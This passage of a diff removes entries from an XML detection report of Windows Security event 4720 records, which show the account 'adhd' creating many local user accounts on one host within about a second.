Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Scott&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Scott</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5179</recordid>
-            <time>2020-06-11 22:05:09.166891200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.1668912Z'/&gt;&lt;EventRecordID&gt;5179&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Theresa&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1189&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Theresa&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Theresa</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5173</recordid>
-            <time>2020-06-11 22:05:09.92370300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.0923703Z'/&gt;&lt;EventRecordID&gt;5173&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jeffrey&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1188&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jeffrey&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jeffrey</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5167</recordid>
-            <time>2020-06-11 22:05:09.8307700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:09.0083077Z'/&gt;&lt;EventRecordID&gt;5167&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ethan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1187&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ethan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ethan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5161</recordid>
-            <time>2020-06-11 22:05:08.928664500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.9286645Z'/&gt;&lt;EventRecordID&gt;5161&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Katherine&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1186&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Katherine&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Katherine</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5155</recordid>
-            <time>2020-06-11 22:05:08.848213800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.8482138Z'/&gt;&lt;EventRecordID&gt;5155&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Catherine&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1185&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Catherine&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Catherine</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5149</recordid>
-            <time>2020-06-11 22:05:08.763714900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.7637149Z'/&gt;&lt;EventRecordID&gt;5149&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Mary&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1184&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Mary&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Mary</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5143</recordid>
-            <time>2020-06-11 22:05:08.689473900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.6894739Z'/&gt;&lt;EventRecordID&gt;5143&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Martha&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1183&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Martha&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Martha</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5137</recordid>
-            <time>2020-06-11 22:05:08.604417600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.6044176Z'/&gt;&lt;EventRecordID&gt;5137&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Betty&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1182&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Betty&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Betty</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5131</recordid>
-            <time>2020-06-11 22:05:08.512463900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:08.5124639Z'/&gt;&lt;EventRecordID&gt;5131&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Shirley&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1181&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data 